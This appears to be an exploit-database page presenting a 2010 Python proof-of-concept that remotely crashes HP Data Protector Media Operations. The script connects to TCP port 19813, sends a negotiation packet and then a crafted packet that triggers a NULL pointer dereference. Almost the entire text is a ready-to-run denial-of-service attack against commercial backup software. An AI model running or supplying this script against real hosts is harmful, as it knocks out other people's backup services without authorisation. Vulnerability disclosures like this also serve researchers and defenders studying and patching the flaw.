[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : HP Data Protector Media Operations NULL Pointer Dereference Remote DoS
# Published : 2010-10-06
# Author : d0lc3
# Previous Title : Multiple Vendors libc/glob(3) Resource Exhaustion (+0day remote ftpd-anon)
# Next Title : Microsoft Office HtmlDlgHelper Class Memory Corruption
#!/usr/bin/python
import socket,struct,sys,os
SIGN=0x04030201
cmd=0x01000000
def main():
if len(sys.argv)!=2:
print"n[x] Usage: python "+sys.argv[0]+" < ip_server >n"
sys.exit(0)
else:
host=sys.argv[1],19813 #default port TCP/19813
if sys.platform=="win32":
os.system("cls")
else:
os.system("clear")
s=socket.socket()
try:
s.connect(host)
s.recv(1024)
except:
print"[x] Error connecting to remote host! This is g00d :D."
sys.exit(0)
print"[+] Building crafted packets..."
#packet negotiation request
pktnego=struct.pack(">L",cmd+0x1) #+0
pktnego+=struct.pack("<L",0x00000000) #+4
pktnego+=struct.pack("<L",SIGN) #+8 (signature)
#packet crash
pkt1=struct.pack("<L",cmd+0x2)
pkt1+=struct.pack(">L",0x00000001) # != 0x0
pkt1+=struct.pack("<L",SIGN)
#end
print"[+] Negotiation."
s.send(pktnego)
s.recv(1024)
s.send(pkt1)#crash!
s.close()
if __name__=="__main__":
main()
#PoC: http://www.exploit-db.com/sploits/15214.zip